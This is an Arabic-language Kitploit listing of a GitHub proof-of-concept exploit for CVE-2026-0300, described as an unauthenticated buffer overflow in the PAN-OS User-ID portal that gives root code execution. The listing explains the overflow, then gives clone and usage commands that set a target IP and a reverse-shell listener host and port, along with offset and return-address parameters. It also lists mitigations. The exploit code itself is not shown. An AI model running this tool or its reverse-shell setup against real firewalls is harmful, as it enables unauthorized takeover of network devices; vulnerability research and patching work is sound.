Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-0300-POC — إثبات المفهوم لـ CVE-2026-0300، وهو تجاوز سعة المخزن المؤقت الحرج في بوابة User-ID الخاصة بـ PAN-OS مما يتيح تنفيذ التعليمات البرمجية عن بُعد دون مصادقة بصلاحيات الجذر. | Kitploit
أدوات/GitHubGitHub/p3nt3st3r-star/cve-2026-0300-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubp3nt3st3r-star/cve-2026-0300-poc

CVE-2026-0300-POC

إثبات المفهوم لـ CVE-2026-0300، وهو تجاوز سعة المخزن المؤقت الحرج في بوابة User-ID الخاصة بـ PAN-OS مما يتيح تنفيذ التعليمات البرمجية عن بُعد دون مصادقة بصلاحيات الجذر.

عرض المستودع
2111منذ 3 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ CVE-2026-0300: تحليل RCE لبوابة PAN-OS User-ID™

إثبات المفهوم البحثي: CWE-787 الكتابة خارج الحدود

Security Python License Dependencies

📌 نظرة عامة

CVE-2026-0300 هي ثغرة فائض مخزن مؤقت عالية الخطورة تم تحديدها في بوابة مصادقة User-ID™ (البوابة الأسيرة) الخاصة بـ Palo Alto Networks PAN-OS. يوضح هذا المستودع البحثي المنطق التقني للثغرة، مع التركيز بشكل خاص على كيفية تمكن حزمة شبكة غير مصادق عليها من الوصول إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) بصلاحيات الجذر.


📊 تفصيل الثغرة

الميزةالتفاصيل
معرف CVECVE-2026-0300
درجة الخطورة9.3 (حرجة)
نوع الضعفCWE-787: الكتابة خارج الحدود
متجه الهجومالشبكة (بدون مصادقة)
الصلاحيات المطلوبةلا شيء
تفاعل المستخدملا شيء
البرامج المتأثرةPAN-OS 12.1, 11.2, 11.1, 10.2

🔬 الآلية التقنية

تحدث الثغرة عندما تفشل خدمة بوابة مصادقة User-ID في التحقق من طول البيانات الواردة قبل كتابتها في مخزن مؤقت للذاكرة.

  1. المخزن المؤقت: تخصص الخدمة منطقة ذاكرة بحجم ثابت لمعالجة طلبات البوابة.
  2. الفائض: يرسل طلب POST مصمم خصيصًا حمولة تتجاوز هذا الحجم.
  3. الكتابة الفوقية: تقوم البيانات الزائدة بالكتابة فوق المكدس/الكومة، مما يسمح للمهاجم بالتحكم في مؤشر التعليمات (EIP/RIP) وتنفيذ كود شل تعسفي.

🛠️ التثبيت والإعداد

1. المتطلبات الأساسية

  • Python 3.9 أو أحدث.
  • لا توجد مكتبات خارجية مطلوبة (يستخدم socket و struct و argparse القياسية).

2. استنساخ الأداة البحثية

استنساخ المستودع

root@kitploit:~
git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git

الانتقال إلى المجلد

root@kitploit:~
cd CVE-2026-0300-POC

جعل السكربت قابلاً للتنفيذ

root@kitploit:~
chmod +x research_poc.py

🚀 دليل الاستخدام

تم تصميم هذه الأداة بواجهة سطر أوامر احترافية (CLI).

الأمر الأساسي

root@kitploit:~
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>

المعلمات المتقدمة

العلمالاسمالوصفالافتراضي
-t--target(مطلوب) عنوان IP الهدف لجدار الحماية.لا يوجد
-p--portالمنفذ الذي تعمل عليه بوابة User-ID.6082
-o--offsetطول البايت للوصول إلى نقطة فائض الذاكرة.2048
-r--retعنوان الإرجاع بالنظام الست عشري.0xdeadbeef
-l--lhostعنوان IP للشل العكسيعنوان IP الخاص بك
-L--lportمنفذ المستمع الخاص بك4444

🛡️ التخفيف والسلامة

  • تحديث PAN-OS: قم بتثبيت أحدث التصحيحات الأمنية (صدرت في مايو 2026).
  • تقييد IP: قم بتقييد الوصول إلى البوابة لمناطق IP الداخلية الموثوقة.
  • تعطيل البوابة: إذا لم تكن مصادقة User-ID مطلوبة، فقم بتعطيل الميزة.

⚠️ إخلاء المسؤولية الأخلاقي والقانوني

لأغراض تعليمية وبحثية مصرح بها فقط. الاختبار غير المصرح به ضد الأنظمة التي لا تملكها غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام لرمز البحث هذا. استخدمه بمسؤولية لتحسين الأمن العالمي. تم التطوير بواسطة: https://t.me/p3Nt3st3rsTAr تاريخ اكتشاف الثغرة: 07 مايو 2026

تنزيل الأداة